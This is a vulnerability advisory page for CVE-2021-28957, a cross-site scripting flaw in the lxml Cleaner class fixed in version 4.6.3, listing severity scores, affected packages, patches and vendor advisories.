CVE-2021-28957Cross-site Scripting in Lxml

CWE-79Cross-site Scripting10 documents8 sources
Severity
6.1MEDIUMNVD
EPSS
0.5%
top 33.23%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
4
LxmlDebian LinuxFedoraproject Fedora+1 more
Timeline
PublishedMar 21
Latest updateApr 8

Description

An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments, the Cleaner class does not remove the formaction attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML. This issue is patched in lxml 4.6.3.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NExploitability: 2.8 | Impact: 2.7

Affected Packages4 packages

NVDlxml/lxml< 4.6.3
PyPIlxml/lxml< 4.6.3
Debianlxml/lxml< 4.6.3-1+3

Also affects: Debian Linux 10.0, 9.0, Fedora 33, 34

Patches

Patch: github.comPatch: github.comPatch: www.oracle.com

🔴Vulnerability Details

4
GHSA
lxml vulnerable to Cross-Site Scripting2021-03-22
OSV
lxml vulnerable to Cross-Site Scripting2021-03-22
OSV
CVE-2021-28957: An XSS vulnerability was discovered in python-lxml's clean module versions before 42021-03-21
CVEList
CVE-2021-28957: An XSS vulnerability was discovered in python-lxml's clean module versions before 42021-03-21

📋Vendor Advisories

5
Ubuntu
lxml vulnerability2021-04-08
Ubuntu
lxml vulnerability2021-03-30
Red Hat
python-lxml: Missing input sanitization for formaction HTML5 attributes may lead to XSS2021-03-21
Microsoft
An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments the Cleaner class does not remove the formaction attribu2021-03-09
Debian
CVE-2021-28957: lxml - An XSS vulnerability was discovered in python-lxml's clean module versions befor...2021
CVE-2021-28957 — Cross-site Scripting in Lxml | cvebase